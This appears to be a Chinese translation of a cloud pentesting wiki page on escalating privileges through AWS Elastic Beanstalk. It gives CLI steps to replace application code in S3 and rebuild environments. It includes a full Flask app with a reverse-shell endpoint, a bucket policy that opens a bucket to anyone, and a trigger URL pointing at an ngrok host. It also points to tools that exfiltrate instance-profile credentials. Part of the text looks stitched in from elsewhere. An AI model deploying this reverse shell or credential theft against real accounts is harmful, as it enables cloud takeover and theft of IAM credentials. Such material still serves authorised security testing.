Elastic Beanstalk
有关Elastic Beanstalk 的更多信息,请查看:
AWS - Elastic Beanstalk Enum
为了在Beanstalk中执行敏感操作,您将需要在许多不同服务中拥有大量敏感权限 。例如,您可以检查授予**arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk
**的权限。
elasticbeanstalk:RebuildEnvironment
、S3写入权限和许多其他权限
拥有对包含环境代码 的S3存储桶的写入权限 以及重建 应用程序的权限(需要elasticbeanstalk:RebuildEnvironment
以及与S3
、EC2
和Cloudformation
相关的其他权限),您可以修改 代码,重建 应用程序,下次访问应用程序时将执行您的新代码 ,使攻击者能够危害应用程序和其IAM角色凭据。
Copy # Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip < files to zi p >
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"
elasticbeanstalk:CreateApplication
, elasticbeanstalk:CreateEnvironment
, elasticbeanstalk:CreateApplicationVersion
, elasticbeanstalk:UpdateEnvironment
, iam:PassRole
等...
提到的以及几个**S3
, EC2
, cloudformation
, autoscaling
和 elasticloadbalancing
**权限是从头开始创建一个原始的Elastic Beanstalk场景所必需的。
创建一个AWS Elastic Beanstalk应用程序:
Copy aws elasticbeanstalk create-application --application-name MyApp
创建一个 AWS Elastic Beanstalk 环境 (支持的平台 ):
Copy aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role
如果环境已经创建,而您不想创建新环境 ,您可以更新 现有环境。
将您的应用程序代码和依赖项打包到一个ZIP文件中:
Copy aws s3 cp MyApp . zip s3 : // elasticbeanstalk -< region >-< accId >/ MyApp . zip
创建一个 AWS Elastic Beanstalk 应用程序版本:
Copy aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
将应用程序版本部署到您的 AWS Elastic Beanstalk 环境:
Copy aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
elasticbeanstalk:CreateApplicationVersion
, elasticbeanstalk:UpdateEnvironment
, cloudformation:GetTemplate
, cloudformation:DescribeStackResources
, cloudformation:DescribeStackResource
, autoscaling:DescribeAutoScalingGroups
, autoscaling:SuspendProcesses
, autoscaling:SuspendProcesses
首先,您需要使用您想要在受害者中运行的代码创建一个合法的Beanstalk环境,按照先前的步骤。可能是一个包含这两个文件的简单zip文件:
application.py requirements.txt
Copy from flask import Flask , request , jsonify
import subprocess , os , socket
application = Flask ( __name__ )
@application . errorhandler ( 404 )
def page_not_found ( e ):
return jsonify ( '404' )
@application . route ( "/" )
def index ():
return jsonify ( 'Welcome!' )
@application . route ( "/get_shell" )
def search ():
host = request . args . get ( 'host' )
port = request . args . get ( 'port' )
if host and port :
s = socket . socket (socket.AF_INET,socket.SOCK_STREAM)
s . connect ((host, int (port)))
os . dup2 (s. fileno (), 0 )
os . dup2 (s. fileno (), 1 )
os . dup2 (s. fileno (), 2 )
p = subprocess . call ([ "/bin/sh" , "-i" ])
return jsonify ( 'done' )
if __name__ == "__main__" :
application . run ()
权限提升
AWS Elastic Beanstalk特权升级
步骤1:查找环境凭证
登录到AWS控制台并导航到Elastic Beanstalk控制台。
在“软件”配置部分查找凭证信息,包括数据库密码等。
步骤2:利用凭证获取更高权限
使用找到的凭证信息尝试访问其他AWS服务,如S3存储桶。
如果成功访问其他服务,则可以进一步探索和提升权限。
Copy click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1
一旦您的Beanstalk环境运行 您的反向shell,就是时候将其迁移到受害者 环境了。为此,您需要更新 您的Beanstalk S3存储桶的存储桶策略 ,以便受害者可以访问 它(请注意,这将向所有人 开放该存储桶):
Copy {
"Version" : "2008-10-17" ,
"Statement" : [
{
"Sid" : "eb-af163bf3-d27b-4712-b795-d1e33e331ca4" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : [
"s3:ListBucket" ,
"s3:ListBucketVersions" ,
"s3:GetObject" ,
"s3:GetObjectVersion" ,
"s3:*"
] ,
"Resource" : [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022" ,
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
} ,
{
"Sid" : "eb-58950a8c-feb6-11e2-89e0-0800277d041b" ,
"Effect" : "Deny" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "s3:DeleteBucket" ,
"Resource" : "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
Copy # Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"
# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host =0.tcp.eu.ngrok.io & port = 13528
Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).
The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.